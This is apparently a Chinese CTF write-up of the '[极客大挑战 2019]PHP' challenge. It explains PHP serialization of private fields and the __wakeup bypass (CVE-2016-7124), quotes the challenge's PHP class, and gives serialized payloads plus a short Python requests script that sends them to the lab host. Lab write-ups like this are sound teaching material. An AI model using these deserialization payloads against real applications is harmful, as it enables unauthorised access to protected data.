[极客大挑战 2019]PHP

0x00知识点

1:直接扫描目录得到网站源码。
2:public、protected与private在序列化时的区别

protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。因此保护字段的字段名在序列化时,字段名前面会加上*的前缀。这里的 表示 ASCII 码为 0 的字符(不可见字符),而不是 组合。这也许解释了,为什么如果直接在网址上,传递*username会报错,因为实际上并不是,只是用它来代替ASCII值为0的字符。必须用python传值才可以。
private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上的前缀。字符串长度也包括所加前缀的长度。其中  字符也是计算长度的。

3:__wakeup()方法绕过
一个经常被用来出题的函数
(CVE-2016-7124)

作用:与__sleep()函数相反,__sleep()函数,是在序序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。绕过:当反序列化字符串,表示属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。

0x01解题

关键代码:

<?php
include 'flag.php';

error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo '</br>NO!!!hacker!!!</br>';
            echo 'You name is: ';
            echo $this->username;echo '</br>';
            echo 'You password is: ';
            echo $this->password;echo '</br>';
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo '</br>hello my friend~~</br>sorry i can't give you the flag!';
            die();

        }
    }
}
?>

大致思路就是通过反序列化来执行__destruct()中的echo $flag。两个条件$this->password == 100,$this->username === 'admin'。

直接将代码反序列化

结果:

O:4:'Name':2:{s:14:'Nameusername';s:5:'admin';s:14:'Namepassword';i:100;}

其中name后面的2,代表类中有2个属性,但如果我们把2改成3,就会绕过__wakeup()函数。而且因为是private声明,我们需要在类名和字段名前面都会加上的前缀

O:4:'Name':3:{s:14:'Nameusername';s:5:'admin';s:14:'Namepassword';i:100;}

注意:
这里使用python提交,因为他是私有类,
类名和字段名前面都会加上的前缀

这里的 表示 ASCII 码为 0 的字符(不可见字符),而不是 组合。这也许解释了,为什么如果直接在网址上,传递*username会报错,因为实际上并不是,只是用它来代替ASCII值为0的字符。必须用python传值才可以。

exp:

import  requests

url ='http://7bc3f84d-1e2f-4a49-897a-15eb4d1d5255.node3.buuoj.cn'
html = requests.get(url+'?select=O:4:'Name':3:{s:14:'Nameusername';s:5:'admin';s:14:'Namepassword';i:100;}')
print(html.text)

exp2:
如果不使用python提交
在url栏中会出现
有空白符,而复制的时候会丢失。
加上%00

payload:

O:4:'Name':3:{s:14:'%00Name%00username';s:5:'admin';s:14:'%00Name%00password';i:100;}

参考链接:

https://blog.csdn.net/weixin_44077544/article/details/103542260

(0)

相关推荐